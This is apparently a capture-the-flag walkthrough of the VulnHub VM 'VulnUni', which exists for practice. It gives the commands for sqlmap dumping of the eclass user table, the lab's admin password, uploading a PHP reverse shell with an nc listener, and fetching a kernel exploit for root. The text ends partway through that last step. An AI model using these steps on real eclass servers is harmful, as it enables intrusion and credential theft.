VulnUni: 1.0.1 | walkthrough |writeup| vulnhub

5 min readApr 24, 2020

DESCRIPTION:

__      __    _         _    _       _ 
 \ \    / /   | |       | |  | |     (_)
  \ \  / /   _| |_ __   | |  | |_ __  _ 
   \ \/ / | | | | '_ \  | |  | | '_ \| |
    \  /| |_| | | | | | | |__| | | | | |
     \/  \__,_|_|_| |_|  \____/|_| |_|_|

Welcome to "Vuln Uni"!
This boot2root machine is realistic without any CTF elements and pretty straight forward.
Goal: Hack your University and get root access to the server.
To successfully complete the challenge you need to get user and root flags.
Difficulty: Easy / Beginner Level
https://emaragkos.gr/vulnhub-writeups/vulnhub-boot2root-machine-vulnuni/
Need hints? Twitter @emaragkos
DHCP is enabled
Your feedback is really valuable for me!
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
Good luck and have fun :)
## Changelog v1.0.1 - 2020-03-20 v1.0 - 2020/03-19

DOWNLOAD LINK: https://download.vulnhub.com/vulnuni/vulnuni1.0.1.ova

lets find the ip address for machine with the tool named netdiscover

netdiscover -i vboxnet0

-i device: your network device
for the name of network use command ifconfig

So now lets Start with nmap scan

nmap -v -sCV -A -O -p- 192.168.56.103

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni — We train the top Information Security Professionals

So here only one port is open, Lets Enumerate…

@port 80:

lets visit full site manually and check the source code also,

found a comment in the source code of page courses saying to disable a page “vulnuni-eclass-platform.html” till the new version is installed.

lets visit the commented page manually

found a redirection to the login page

page not found due to the a-name record, as it redirects to the “vulnuni.local/vulnuni-eclass/index.php” ,

lets edit our hosts file

vim /etc/hosts

lets try again

here it is, I tried some default username and password like admin:admin, user:password but didn’t worked.

found the eclass current version installed, lets google for the vulnerabilities in eclass version 1.7.2 .

got vulnerability of Error based sqli on a particular parameter

vulnerability explaination @exploitdb 48106

lets use these parameters , as we don’t have any account so we will go for time-based blind injection as said in above exploit.

sqlmap -u “http://vulnuni.local/vulnuni-eclass/index.php" — dump -D eclass -T user -C username,password — form — crawl=2

got login with admin privilages, with the extracted credential from mysql

admin : ilikecats89

lets follow the another part of the same exploit to take reverse shell.

lets follow and navigate to /modules/course_info/restore_course.php

lets compress our shell in a zip file

zip bla.zip php-reverse-shell.php

upload the zip file and lets start a nc listener

nc -lvp 4455

now we just have to call the given location in the browser “/courses/tmpUnzipping/php-reverse-shell.php” and will get shell.

got shell as www-data and converted it into a stty shell.

flag.txt

Privilage Escalation:

didn’t get any thing intresting in the box else then the kernel version that is exploitable, I have downloaded the exploit which I found at github.

get it downloaded to the victims machine with the help of a python server